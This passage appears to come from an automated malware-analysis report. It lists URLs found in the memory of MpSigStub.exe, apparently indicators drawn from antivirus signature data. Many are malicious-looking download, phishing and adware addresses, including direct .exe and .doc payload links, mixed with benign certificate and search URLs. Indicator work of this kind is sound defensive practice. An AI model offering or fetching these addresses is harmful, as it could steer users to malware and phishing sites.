Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://quantsa.ru/?de
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://qudaih.com/pzlnkda/nbsa
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://queendrinks.com.ar/open-past-due-orders/
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://quickinstallpack.com/quickinstall/order.php?qad=cln&qld=
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://quickuploader.xyz/Kalkkulerne.exe
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://quince78.cyan.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://r%d.clrsch.com/
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://r%d.clrsch.com/ie/
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://r%d.clrsch.com/x
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://r.funmoods.com//
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://raa.qwepoii.org/v4/gtg/
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://raggina.space/bc855646d052/spool/boot/acxbbz.dot
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://randominterest.com/
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://rapidshare.com/files/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://rbmllp.com/member.php
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://readlenta.ru/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://rebrand.ly/ohxnqak
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: http://recoverpcerror.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://redirect.sarahwilkesphotography.co.uk)
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://redirsystem32.com
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://redirsystem32.com/tds1/in.cgi?2&group=mp3
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://redlogisticsmaroc.com/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://redlogisticsmaroc.com/ti/doc/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://reefer.parts/js/lib/)
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://referfile.com
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://refud.me/scan.php
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://registrywizard.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://relawananaksumsel.or.id/blosting/scan.html)
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://remitenow.one/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://remote-keylogger.net
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://remove.gettango.com/
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://renatopaschoal.com.br/dropbox/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://rentalhabneew.com/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://rep.eyeez.com/GetArea.aspx
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://rep4.upseek.org/?r2=launc1
Source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: http://report.wallpaper.shqingzao.com
Source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: http://report.wallpaper.shqingzao.com~
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=xl
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://requestbin.net/r/163xiqa1
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://res-backup.com/bin/3.dotm
Source: MpSigStub.exe, 00000023.00000003.18327831413.0000015B1A891000.00000004.00000001.sdmp String found in binary or memory: http://resource.aldtop.com
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://retinnoplay.com//ord/excelz/index.php
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://retirepedia.upsproutmedia.com/obskdhi.php
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://return.hk.cn/ma/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://rewards.getjar.com
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://rezultsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://rgho.st/download/8ygs8ldbj/3887c2b13922a712c34f8f2407d142bb5b2ed630/3887c2b13922a712c34f8f240
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp String found in binary or memory: http://rghost.net/download/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://rhriss.com.br/site/tmp/swagin
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://risweg.com/flpaoql.exe
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: http://rl.ammyy.com
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://rmportal.bpweb.bp.comx
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://rmuxvayun.pkrgzrpdebksbl.gq:23513/eater.htm?little=15162&extent=kiss&switch=19450
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://ro-member1.com
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://rocesi.com/mncejd.exe
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://romica-puceanu.com
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://rootedmoon.co.uk/css/syle.css.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://royalambassadorschools.com/wp-admin/includes/ftools/johnhood395.php
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://royaldiscoveryholidays.com/log/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://roybeth.com/ext/jquery.php
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://rrppdigital.com.ve/wp-content/ai1wm-backups/chrome.jpg
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://rs-moto.ru/counter/?a=1
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://ruih.co.uk/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://ruih.co.uk/wapp/doc/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://s-elisa.ru/data
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://s.earching.info/
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://s.earching.info/xA
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://s.symcd.com0_
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/111/pubid1001affid100100
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/116/pubid1004affid100400
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/119/pubid1008affid100800
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://s01.yapfiles.ru/files/1017459/2.jpg
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://s2.bestmanage.org/?name=%s
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-143692468872/Installer.exe
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://s3.amazonaws.com/adpk/getsavin/getsavin.ini/noproxygetoksettingslocation2http://s3.amazonaws.
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://s3.amazonaws.com/rewqqq/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://sabadabe.xyz/_output2b172f0.exe
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://saemaeul.mireene.com/skin/board/basic/bin
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://safesaver.net/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://saintechelon.tk/11.doc
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://saintechelon.tk/ejl.doc
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://sameshitasiteverwas.com/traf/tds/in.cgi
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://samunphai.de/sup/dhli.php
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://sandbaggersgolf.club/viewdoc/file.php?document=y2fzyxnqqgzlcnjlci5jb20=
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://santasalete.sp.gov.br/jss/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://saraylimucevherat.com/docfile/good/)
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://saveasapp.com/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://saveimage.pw
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://savory15.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://sbrenind.com/niggab-x/niggab-x.exe
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://sc-cash.com
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://schoolaredu.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://scorpion-swan.com/bene/dhl/dhl.php)
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://scorpion-swan.com/lamba/loginpdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://screenhost.pw/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://screw-malwrhunterteam.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://scrollayer.com
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://scud.pipis.net/
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://sds.clrsch.com/
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://sds.clrsch.com/x
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://sds.qckads.com/sidesearch/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://search.17173.com/index.jsp?keyword=%s
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://search.btchina.net/search.php?query=%s
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/search?p=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://search.crsky.com/search.asp?sType=ResName&keyword=%s
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://search.games.sina.com.cn/cgi-bin/game_search/game_deal.cgi?keywords=%s
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://search.getwebcake.com/
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://search.lycos.com/default.asp?src=clear
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://search.newhua.com/search.asp?Keyword=%s
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://search.psn.cn/
Source: MpSigStub.exe, 00000023.00000003.18334831739.0000015B1A746000.00000004.00000001.sdmp String found in binary or memory: http://search.shopnav.com/
Source: MpSigStub.exe, 00000023.00000003.18334831739.0000015B1A746000.00000004.00000001.sdmp String found in binary or memory: http://search.shopnav.com/_
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://search.union.yahoo.com.cn/click/search.htm?m=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://searchengage.com
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://searchglobalsite.com/in.cgi?
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: http://secure4709.spaldingscpa.com/con/next.php
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://secured.icbegypt.com/windows-update.hta
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://security-updater.com/binaries/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://security.symantec.com
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://seedstar.net
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://seliconos.3utilities.com/
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://sense-super.com/cgi/execute_log.cgi?filename=debug&type=failed_registry_read
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://seocom.name/seogo/go.xmn?ix
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://serbetcimimarlik.com/tests/folder/excell.php
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://server00.send6.com/1abf8588/oluwa.exe
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://server2.39slxu3bw.ru/restore.xmlscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://service.pandtelectric.com/
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: http://service.softpost.com
Source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp String found in binary or memory: http://service.srvmd6.com/Mac/getInstallerSettings/?version=
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://serving.myshopcouponmac.com
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&amp;dyfm=ywx2yxjvx3zl
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://setup-mediaplayer.info/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://setup.theoreon.com
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://setup1.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://setup2.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://setup3.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://setup4.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://seunelson.com.br/js/10.exe
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://seunelson.com.br/js/content.xml
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://seuufhehfueughek.ws/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://sexfellatiomovesex.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18327831413.0000015B1A891000.00000004.00000001.sdmp String found in binary or memory: http://sf-addon.com/helper/setup/SaveFromNetHelper-Setup.exe
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://sf3q2wrq34.ddns.net
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://sfofotky.iexam.info:8080/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://shintorg-k.ru/errors/wpactivt.php
Source: MpSigStub.exe, 00000023.00000003.18303365623.0000015B1C05E000.00000004.00000001.sdmp String found in binary or memory: http://shop.doublepoint.net//install/uplist2.php?pid=
Source: MpSigStub.exe, 00000023.00000003.18303365623.0000015B1C05E000.00000004.00000001.sdmp String found in binary or memory: http://shop.doublepoint.net/install/p_boot.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://shoppingjardin.com.py/v1/wp-themes/2.php
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://show.daohang.la:5000/go/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://sighttp.qq.com
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://silberlivigno.com/outstanding-invoices/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://silver13.net/java.exe
Source: MpSigStub.exe, 00000023.00000003.18290582002.0000015B1BF65000.00000004.00000001.sdmp String found in binary or memory: http://simple%-files.com
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://simplesexinc.com/file/
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://simsoshop.com/update.php?c=
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: http://sindarspen.org.br/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://sistemasagriculturagov.org/modulos
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://sitem.biz/
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://skidochuks.de.nr
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://skidware-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://skorohod.city/invoice-corrections-for-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://skyfalss.ir/hacnhhy/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://skype.tom.com/download/install/sobar.exe
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://slideshowlullabies.com/plugins/content/pagenavigation/item.php)
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://slpsrgpsrhojifdij.ru/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://slpsrgpsrhojifdij.ru/krablin.exe?
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://sluzby-specjalne.cba.pl/nr26.txt
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://smart-antivirus-2009buy.com
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=x
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://smg-blackhat.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://smpcollection.ir/poss/doc/purchase.doc
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://sndy2kungglobalinvestmentgooglednsaddres.duckdns.org/office/
